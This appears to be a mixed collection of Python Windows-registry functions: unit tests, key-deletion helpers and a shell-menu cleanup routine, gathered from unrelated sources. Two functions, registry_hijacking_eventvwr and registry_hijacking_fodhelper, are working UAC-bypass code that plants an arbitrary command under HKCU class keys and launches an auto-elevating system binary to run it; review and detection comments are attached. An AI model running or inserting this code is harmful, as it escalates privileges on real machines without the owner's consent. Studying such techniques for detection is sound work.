def test_long_key(self):
    # Exercise a 256-character subkey name: create the test key, store a
    # default value under a subkey with the long name, query/enumerate it,
    # then remove both the long subkey and the test key (cleanup runs even
    # when the body fails, so a broken run does not leave keys behind).
    from _winreg import (HKEY_CURRENT_USER, KEY_ALL_ACCESS, CreateKey, SetValue,
                         EnumKey, REG_SZ, QueryInfoKey, OpenKey, DeleteKey)
    long_name = 'x' * 256
    try:
        with CreateKey(HKEY_CURRENT_USER, self.test_key_name) as handle:
            SetValue(handle, long_name, REG_SZ, 'x')
            subkey_count, value_count, last_modified = QueryInfoKey(handle)
            EnumKey(handle, 0)
    finally:
        with OpenKey(HKEY_CURRENT_USER, self.test_key_name, 0, KEY_ALL_ACCESS) as handle:
            DeleteKey(handle, long_name)
        DeleteKey(HKEY_CURRENT_USER, self.test_key_name)
def registry_hijacking_eventvwr(cmd, params=""):
    r"""Set the default value of HKCU\Software\Classes\mscfile\shell\open\command
    to `cmd` (with `params` appended when given), launch eventvwr.exe, sleep 5
    seconds, then delete the key.

    Detection/forensics notes: the registry write to that path happens before
    the launch and is the durable artifact of this technique; the key is only
    removed if every call before DeleteKey succeeds (check_output raises
    CalledProcessError on a non-zero exit and the cleanup line is then skipped).
    """
    # '''
    # Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
    # '''
    HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
    mscCmdPath = r'Software\Classes\mscfile\shell\open\command'
    if params:
        # NOTE(review): .strip() runs on the template '%s %s' before substitution,
        # so it does nothing here; the result is always "cmd params".
        cmd = '%s %s'.strip() % (cmd, params)
    try:
        # The registry key already exist in HKCU, altering...
        registry_key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE)
    except:
        # Adding the registry key in HKCU
        # NOTE(review): bare except — any failure (not only a missing key,
        # e.g. KeyboardInterrupt) falls through to CreateKey.
        registry_key = CreateKey(HKCU, mscCmdPath)
    SetValueEx(registry_key, '', 0, REG_SZ, cmd)
    CloseKey(registry_key)
    # Executing eventvwr.exe
    # NOTE(review): the path is built from the WINDIR environment variable and
    # run through the shell (shell=True); WINDIR is taken as-is.
    eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe')
    subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True)
    # Sleeping 5 secds...
    time.sleep(5)
    #Clean everything
    # Not in a finally block: any exception above leaves the value in place.
    DeleteKey(HKCU, mscCmdPath)
def registry_hijacking_fodhelper(cmd, params=""):
    r"""Write an empty 'DelegateExecute' value and set the default value of
    HKCU\Software\Classes\ms-settings\Shell\Open\command to `cmd` (with `params`
    appended when given), launch fodhelper.exe with WOW64 file-system
    redirection disabled, sleep 5 seconds, then delete the key.

    Detection/forensics notes: the two value writes under that path are the
    durable artifact; DeleteKey runs last and is skipped if any earlier call
    raises (check_output raises CalledProcessError on a non-zero exit).
    """
    HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
    fodhelperPath = r'Software\Classes\ms-settings\Shell\Open\command'
    if params:
        # NOTE(review): .strip() runs on the template '%s %s' before substitution,
        # so it does nothing here; the result is always "cmd params".
        cmd = '%s %s'.strip() % (cmd, params)
    try:
        # The registry key already exist in HKCU, altering...
        # NOTE(review): the handle returned here is discarded and never closed.
        OpenKey(HKCU, fodhelperPath, KEY_SET_VALUE)
    except:
        # Adding the registry key in HKCU
        # NOTE(review): bare except (catches everything); this handle is also
        # discarded and never closed.
        CreateKey(HKCU, fodhelperPath)
    registry_key = OpenKey(HKCU, fodhelperPath, 0, KEY_WRITE)
    SetValueEx(registry_key, 'DelegateExecute', 0, REG_SZ, "")
    SetValueEx(registry_key, '', 0, REG_SZ, cmd)
    CloseKey(registry_key)
    # Creation fodhelper.exe path
    # NOTE(review): built from the WINDIR environment variable as-is and run
    # through the shell (shell=True).
    triggerPath = os.path.join(os.environ['WINDIR'],'System32','fodhelper.exe')
    # Disables file system redirection for the calling thread (File system redirection is enabled by default)
    wow64 = ctypes.c_long(0)
    ctypes.windll.kernel32.Wow64DisableWow64FsRedirection(ctypes.byref(wow64))
    # Executing fodhelper.exe
    subprocess.check_output(triggerPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True)
    # Enable file system redirection for the calling thread
    # Not in a finally block: if check_output raises, redirection stays
    # disabled for this thread.
    ctypes.windll.kernel32.Wow64EnableWow64FsRedirection(wow64)
    # Sleeping 5 secds...
    time.sleep(5)
    # Clean everything
    DeleteKey(HKCU, fodhelperPath)
def test_delete(self):
    # Remove every value listed in self.test_data from the "sub_key" child of
    # the test key, then delete the (now value-free) child key itself.
    from _winreg import OpenKey, KEY_ALL_ACCESS, DeleteValue, DeleteKey
    parent = OpenKey(self.root_key, self.test_key_name, 0, KEY_ALL_ACCESS)
    child = OpenKey(parent, "sub_key", 0, KEY_ALL_ACCESS)
    for value_name, _value, _value_type in self.test_data:
        DeleteValue(child, value_name)
    DeleteKey(parent, "sub_key")
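def reg_del(name, key=HKEY_CURRENT_USER):
    """Delete the registry key `name` (a path relative to `key`) on Windows.

    Args:
        name: subkey path to delete, relative to `key`.
        key: predefined root handle; defaults to HKEY_CURRENT_USER.

    Returns:
        True when the key was deleted; False when the registry raised
        WindowsError (missing key, access denied, ...); None after printing
        the administrator hint when ConnectRegistry raised ConnectRegistryError.

    Note: `ConnectRegistryError` is not a `_winreg`/`winreg` name — it must be
    defined elsewhere in this file (verify), and `WindowsError` exists only on
    Windows.
    """
    try:
        reg = ConnectRegistry(None, key)
        try:
            DeleteKey(reg, name)
        finally:
            # Release the root handle even when DeleteKey raises; the original
            # only closed it on the success path.
            CloseKey(reg)
        # TODO: broadcast WM_SETTINGCHANGE so running programs pick up the
        # change (SendMessage(HWND_BROADCAST, WM_SETTINGCHANGE, 0, 'Environment')).
        return True
    except ConnectRegistryError:
        print('You should run this command as system administrator: run the terminal as administrator and type the command again.')
        return None
    except WindowsError:
        return False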
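def remove_all_registry_entries():
    r"""
    Removes all related registry entries.

    Walks the subkeys of HKCU\Software\Classes\*\shell; for each subkey whose
    name contains 'DiWaCS', deletes its child keys and then the subkey itself.
    Entries that cannot be deleted are skipped. Any other exception is logged
    through _logger() and swallowed; the parent handle is always closed.
    """
    main_key = None
    try:
        main_key = OpenKey(HKEY_CURRENT_USER, r'Software\Classes\*\shell', 0, KEY_ALL_ACCESS)
        index = 0
        while True:
            try:
                key_name = EnumKey(main_key, index)
            except WindowsError:
                break  # no more subkeys
            if 'DiWaCS' not in key_name:
                index += 1
                continue
            key = OpenKey(main_key, key_name, 0, KEY_ALL_ACCESS)
            try:
                # Always enumerate index 0: deleting a child shifts the remaining
                # ones down, so advancing the index (as before) skipped every
                # other child and the parent delete below then failed.
                # DeleteKey stays inside the try so a child that cannot be
                # removed ends the loop instead of spinning on it.
                while True:
                    try:
                        child_name = EnumKey(key, 0)
                        DeleteKey(key, child_name)
                    except WindowsError:
                        break
            finally:
                CloseKey(key)
            try:
                DeleteKey(main_key, key_name)
            except WindowsError:
                # Could not remove it (e.g. children remain); step past it.
                index += 1
            # On success the next entry slides into this index: do not advance.
    except Exception as excp:
        excp_string = 'Exception in remove_all_registry_entries: {0!s}'
        _logger().exception(excp_string.format(excp))
    finally:
        if main_key:
            CloseKey(main_key)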
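def delete_key(hkey, subkey, name):
    """Delete registry key `name` beneath the key `subkey` under root `hkey`.

    Args:
        hkey: root handle passed to RegistryHelper.get_key.
        subkey: path of the parent key, opened with KEY_READ.
        name: child key to delete.

    Returns:
        The value of the underlying delete call (None from DeleteKey; whatever
        win32api.RegDeleteKey returns on 64-bit machines), or None when the
        parent could not be opened or the delete raised WindowsError. Errors
        are reported through LogHelper.error; the leftover debug prints that
        echoed the handle, result and error to stdout were removed.
    """
    registry_key = RegistryHelper.get_key(hkey, subkey, KEY_READ, False)
    if not registry_key:
        # get_key signalled failure with a falsy value; nothing to close.
        return None
    result = None
    try:
        if PlatformHelper.is_64bit_machine():
            # NOTE(review): why win32api is preferred on 64-bit hosts is not
            # visible here (presumably registry-view handling) — confirm.
            result = win32api.RegDeleteKey(registry_key, name)
        else:
            result = DeleteKey(registry_key, name)
    except WindowsError as e:
        LogHelper.error(str(e))
        result = None
    finally:
        RegistryHelper.close_key(registry_key)
    return result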